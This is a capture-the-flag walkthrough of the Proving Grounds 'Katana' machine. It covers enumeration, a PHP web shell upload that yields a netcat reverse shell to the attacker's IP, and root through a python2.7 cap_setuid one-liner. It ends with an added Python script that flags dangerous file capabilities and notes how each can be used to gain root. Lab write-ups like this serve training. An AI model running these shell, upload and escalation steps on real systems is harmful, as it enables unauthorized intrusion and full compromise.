KATANA has been PWNED!!!! — Offensive Security
This is one of the Proving Grounds machines from Offensive Security, rated easy. So let’s pwn this machine.
ENUMERATION
Starting off with a scan for open ports and the services behind them.
Highlighting all of these is good practice ;-). The scan turned up several open ports and numerous HTTP services. Because there are so many of them, running nikto against each one will be my last resort.
Brute forcing web directories on the different ports. The output files:
gobuster.txt is for port 80
gobuster8088.txt is for port 8088
gobusterdir.txt is for dir brute on port 80
gobusterdir8088.txt is for dir brute on port 8088
Surprisingly, I found upload.html, so without further ado I uploaded a one-line PHP payload and waited one minute, as the web page instructed. Since the initial recon showed many HTTP services, I then hopped over to port 8715 with the URL of the uploaded file (the server prefixes the name with katana_). Suppose the uploaded file is cmd.php; the URL-encoded payload is then:
http%3A%2F%2F192.168.100.131%3A8715%2Fkatana_cmd.php%3Fcmd%3Dnc%20-e%20%2Fbin%2Fsh%20192.168.100.128%209999
My listener was already waiting on that port, and YES!!! we’re in!
Privilege Escalations
Enumerating the target after gaining access, I looked for file capabilities with getcap and found python2.7 carrying a capability with the +ep flags. That is not an “empty” capability: +ep means the capability is in the binary’s permitted set and is made effective at exec, so any user who can run the binary, www-data included, gets it without being root or needing SUID. Since the one-liner below calls os.setuid(0), the capability in play is cap_setuid, which makes the interpreter as good as a SUID-root binary. Taking advantage of it, I can escalate from the low-privilege shell with the command below.
python2.7 -c 'import pty;import os;os.setuid(0);pty.spawn("/bin/dash")'
And we are now root!!! The flag was waiting for us ;-)
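The capability check above, as an added Python 3 example that is not the write-up's own code: it parses the output of `getcap -r / 2>/dev/null` (both the older `/path = cap+ep` and the newer `/path cap=ep` formats), flags capabilities that amount to root, and distinguishes +ep (effective at exec, directly exploitable the way python2.7 was) from +p (permitted only, where the program itself would have to raise the capability with capset, which a stock interpreter never does). The sample lines are constructed; the python2.7 line mirrors what the write-up describes, the others are typical harmless or permitted-only entries.

```python
"""Triage getcap output for file capabilities that amount to root (added example)."""
import re
import sys
from dataclasses import dataclass
from typing import Dict, List, Optional

# Capabilities that become root in a command or two when effective on a binary
# any user may run. The note says what to do with each one.
DANGEROUS = {
    "cap_setuid": "os.setuid(0) then spawn a shell (the python2.7 one-liner above)",
    "cap_setgid": "setgid(0) for root group access, pair with another primitive",
    "cap_dac_override": "bypass file permission checks: edit /etc/passwd or /etc/shadow",
    "cap_dac_read_search": "read any file: /etc/shadow, root's SSH keys",
    "cap_chown": "chown /etc/shadow (or any file) to yourself",
    "cap_fowner": "chmod files you do not own",
    "cap_sys_admin": "mount and namespace tricks, effectively root",
    "cap_sys_ptrace": "inject into a root-owned process",
    "cap_sys_module": "load a kernel module",
}

# One getcap clause: "cap_a,cap_b+ep", "cap_setuid=ep", "=ep" (every capability), "cap_x-e".
CLAUSE = re.compile(r"^(?P<names>[\w,]*)(?P<op>[+=\-])(?P<flags>[eip]*)$")

# Constructed sample; the first line mirrors the finding in the write-up.
SAMPLE = [
    "/usr/bin/python2.7 = cap_setuid+ep",
    "/usr/bin/ping = cap_net_raw+ep",
    "/usr/bin/python3.8 cap_setuid=p",
    "/usr/sbin/tcpdump cap_net_admin,cap_net_raw=ep",
]


@dataclass
class Finding:
    path: str
    cap: str
    flags: str
    direct: bool  # True when the cap is effective at exec (+ep): nothing to raise
    note: str


def parse_getcap_line(line: str) -> Optional[dict]:
    """Split one getcap line into {"path": ..., "caps": {cap: flags}}.

    Handles "/path = cap_setuid+ep" (libcap < 2.41) and "/path cap_setuid=ep"
    (libcap >= 2.41). Paths containing spaces are not handled in the new
    format. Returns None for lines that do not look like getcap output.
    """
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, _, text = line.partition(" = ")
    else:
        path, _, text = line.partition(" ")
    caps: Dict[str, str] = {}
    for clause in text.split():
        m = CLAUSE.match(clause)
        if not m:
            return None
        names = m["names"].split(",") if m["names"] else ["all"]
        for name in names:
            if m["op"] == "-":  # "-e" style clause removes flags
                caps[name] = "".join(f for f in caps.get(name, "") if f not in m["flags"])
            else:  # "+" and "=" both leave the named flags set
                caps[name] = m["flags"]
    return {"path": path, "caps": caps}


def triage(lines: List[str]) -> List[Finding]:
    """Return the dangerous capabilities found, in input order."""
    findings: List[Finding] = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        for cap, flags in parsed["caps"].items():
            hits = list(DANGEROUS) if cap == "all" else ([cap] if cap in DANGEROUS else [])
            for name in hits:
                direct = "e" in flags and "p" in flags
                findings.append(Finding(parsed["path"], name, flags, direct, DANGEROUS[name]))
    return findings


if __name__ == "__main__":
    # Pipe real output in:  getcap -r / 2>/dev/null | python3 capcheck.py
    lines = SAMPLE if sys.stdin.isatty() else sys.stdin.read().splitlines()
    for f in triage(lines):
        kind = "DIRECT" if f.direct else "permitted-only (needs capset in the program)"
        print(f"{f.path}: {f.cap}+{f.flags} [{kind}] -> {f.note}")
```

On the target the only lines worth acting on are the DIRECT ones; a permitted-only entry is still worth recording, because a script or binary that calls capset itself could turn it into the same primitive.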
— — — — — — — — — — — — — — — — — — — — — — — -
Let me know if you face any issues
================
That’s all for now,
Until Next Time,
You are Awesome!!!
— — — — — — — — — — — — —